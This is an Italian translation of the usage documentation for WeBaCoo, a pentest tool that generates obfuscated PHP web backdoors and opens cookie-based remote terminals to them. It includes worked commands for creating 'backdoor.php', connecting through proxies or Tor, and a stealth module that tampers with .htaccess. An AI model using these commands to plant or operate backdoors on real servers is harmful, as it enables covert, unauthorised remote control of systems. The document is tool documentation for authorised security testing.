
Kit di script backdoor web tramite cookie
| | | | | ___ \ / __ \
| | | | | |/ / __ | / / ___ ___
| |/| |/ _ \ ___ / ` | | / _ \ / _ \
\ /\ / __/ |/ / (| | _/\ () | (_) |
/ / __/ _,|_/_/ _/
Web Backdoor Cookie Script-Kit
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Scritto da: Anestis Bechtsoudis @ bechtsoudis.com Copyright (C) 2011-2012 Anestis Bechtsoudis
Lo strumento è solo a scopo di test e può essere utilizzato solo dove è stato dato esplicito consenso. Non utilizzarlo per scopi illegali.
Qualsiasi modifica, cambiamento o alterazione di questa applicazione è accettabile, tuttavia, qualsiasi rilascio pubblico che utilizza questo codice deve essere approvato dal suo creatore. Controlla il file LICENSE per maggiori informazioni.
Se non si desidera installare "libio-socket-socks-perl" per la funzionalità proxy Tor, commenta la riga 25 in webacoo.pl
webacoo.pl [opzioni]
Opzioni: -g Genera il codice backdoor (-o è richiesto)
-f FUNZIONE Funzione di sistema PHP da utilizzare FUNZIONE 1: system (predefinito) 2: shell_exec 3: exec 4: passthru 5: popen
-o OUTPUT Nome del file di output backdoor generato
-r Restituisce il codice backdoor senza offuscamento
-t Stabilisce una connessione terminale remota (-u è richiesto)
-u URL URL del backdoor
-e CMD Modalità di esecuzione di comando singolo (-t e -u sono richiesti)
-m METODO Metodo HTTP da utilizzare (predefinito "GET")
-c NOME_COOKIE Nome del cookie (predefinito: "M-cookie")
-d DELIM Delimitatore (predefinito: nuovo casuale per ogni richiesta)
-a AGENT User-agent dell'intestazione HTTP (predefinito esistente)
-p PROXY Usa proxy (tor, ip:porta o utente:password:ip:porta)
-v LIVELLO Livello di verbose LIVELLO 0: nessuna informazione aggiuntiva (predefinito) 1: stampa intestazioni HTTP 2: stampa intestazioni HTTP + dati
-l LOG Registra attività su file
-h Mostra aiuto ed esci
update Controlla aggiornamenti e applica se presenti
Dalla versione 0.2.1 è stato aggiunto il supporto per moduli di estensione al fine di fornire funzionalità extra a WeBaCoo. Nella modalità terminale puoi eseguire 'load' per elencare i moduli disponibili e inizializzare quello desiderato dalla lista. Digitando 'unload' puoi tornare alla modalità terminale iniziale.
Moduli di estensione disponibili: o mysql-cli Modulo riga di comando MySQL o psql-cli Modulo riga di comando Postgres o upload Modulo di upload file tramite HTTP Post o download Modulo di download file tramite stampa su stdout via 'od' e 'xxd' o stealth Modulo per aumentare la furtività tramite gestione .htaccess
Crea backdoor offuscato 'backdoor.php' con impostazioni predefinite ./webacoo.pl -g -o backdoor.php
Crea backdoor non offuscato 'raw-backdoor.php' utilizzando la funzione 'passthru' ./webacoo.pl -g -o raw-backdoor.php -f 4 -r
Stabilisci connessione terminale con host remoto utilizzando la configurazione predefinita ./webacoo.pl -t -u http://127.0.0.1/backdoor.php
Stabilisci connessione terminale con host remoto impostando alcuni argomenti ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"
Stabilisci connessione terminale con host remoto tramite proxy http locale ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080
Stabilisci connessione terminale con host remoto tramite proxy http con autenticazione di base ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128
Stabilisci connessione terminale con host remoto tramite Tor e registra attività ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt